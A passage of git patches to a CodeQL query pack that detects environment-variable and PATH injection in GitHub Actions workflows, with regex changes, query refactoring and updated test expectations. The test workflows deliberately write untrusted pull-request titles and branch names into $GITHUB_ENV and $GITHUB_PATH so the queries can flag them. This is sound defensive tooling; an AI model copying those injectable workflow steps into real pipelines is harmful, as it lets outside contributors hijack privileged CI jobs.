$GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index f88785c38e1a..701cefe2b793 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths From 0f3281c38627ed3d2d5e1812a701f52610209c27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 28 Apr 2024 09:36:27 +0200 Subject: [PATCH 226/707] Support bash heredoc --- ql/lib/codeql/actions/Ast.qll | 38 ++++++++++++++++++- .../actions/security/EnvVarInjectionQuery.qll | 5 ++- ql/src/Security/CWE-077/EnvPathInjection.ql | 2 + ql/src/Security/CWE-077/EnvVarInjection.ql | 20 ++++++---- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +-- .../CWE-077/PrivilegedEnvVarInjection.ql | 24 ++++++------ .../CWE-077/.github/workflows/test4.yml | 9 ++++- .../Security/CWE-077/EnvVarInjection.expected | 9 +++-- .../PrivilegedEnvVarInjection.expected | 11 ++++-- 9 files changed, 92 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8e36aef408ec..bfbc990d6712 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -46,18 +46,39 @@ module Utils { bindingset[var] private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV result = - ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } bindingset[var] private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } + bindingset[var] + private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" + } + bindingset[script, var] predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment @@ -87,6 +108,19 @@ module Utils { .splitAt("\n") + ")" and key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) } bindingset[line] diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6e6e768bdf79..0467a51f4e9c 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -39,7 +39,10 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { * that is used to construct and evaluate an environment variable. */ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" + } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 50ad01497035..80d1729b2670 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -20,8 +20,10 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 109d77d74256..8c2510954577 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -16,23 +16,29 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( + // sink belongs to a composite action exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or + // sink belongs to a non-privileged job exists(Job j | j = sink.getNode().asExpr().getEnclosingJob() and not j.isPrivileged() ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index 593fd620c9f5..a25473fd812e 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -19,10 +19,8 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index bf637af11958..5311d9a4de85 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,20 +16,22 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph +predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { + ( + not source.(RemoteFlowSource).getSourceType() = "artifact" + or + source.(RemoteFlowSource).getSourceType() = "artifact" and + sink instanceof EnvVarInjectionFromFileReadSink + ) +} + from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() - ) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink - ) and - not source.getNode().(RemoteFlowSource).getSourceType() = "branch" + // sink belongs to a privileged job + sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + // exclude paths to file read sinks from non-artifact sources + artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 5061f51db624..154a8135bad4 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -42,12 +42,19 @@ jobs: - env: TITLE: ${{ github.event.pull_request.title }} run: | - cat <<-"EOF" >> "$GITHUB_ENV" + cat <<-EOF >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.head_ref }} + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.event.pull_request.title }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 1cb0b78a29b2..241a33146b88 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 701cefe2b793..8c9d923bd35a 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -7,7 +7,8 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths @@ -40,4 +43,6 @@ subpaths | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | From 831b8cfaa6f0aca1369ae2d6a28b39af20217279 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 28 Apr 2024 12:03:40 +0200 Subject: [PATCH 227/707] Bump qlpack versions --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 -- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 754d28cb93e6..6dd9b5d36171 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -211,8 +211,6 @@ class EventSource extends RemoteFlowSource { or textEvent(context) and flag = "text" or - repoNameEvent(context) and flag = "repo name" - or branchEvent(context) and flag = "branch" 